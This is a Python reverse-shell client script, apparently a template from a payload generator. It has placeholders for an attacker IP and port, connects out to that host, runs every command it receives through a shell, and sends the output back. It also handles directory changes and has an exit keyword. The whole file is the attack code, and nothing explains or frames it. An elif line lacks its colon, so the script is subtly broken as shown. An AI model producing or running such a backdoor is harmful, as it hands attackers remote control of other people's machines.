#!/usr/bin/python
import subprocess, os
from socket import *

host = ">>>IP<<<"
port = >>>PORT<<<
s=socket(AF_INET, SOCK_STREAM)
try:
    s.connect((host,port))
    s.send("NotNeedPayload");
except:
    pass

def main():
    while 1:
			try:
				msg=s.recv(4096)
				if ((msg != "exit") and ("cd " not in msg) and (msg != "hellows123")):
					comm = subprocess.Popen(str(msg), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
					STDOUT, STDERR = comm.communicate()
					en_STDERR = bytearray(STDERR)
					en_STDOUT = bytearray(STDOUT)
					comm.kill()
					if (en_STDERR == ""):
						if (en_STDOUT != ""):
							s.send(en_STDOUT)
						else:
							s.send("[CLIENT] Command Executed")
					else:
						s.send(en_STDERR)
				elif ("cd " in msg)
					msg = msg.replace("cd ","")
					os.chdir(msg)
					s.send(os.getcwd())
				elif (msg == "hellows123"):
					s.send(os.getcwd())
				else:
					s.close()
					break
			except:
				s.close()
				break
				
main()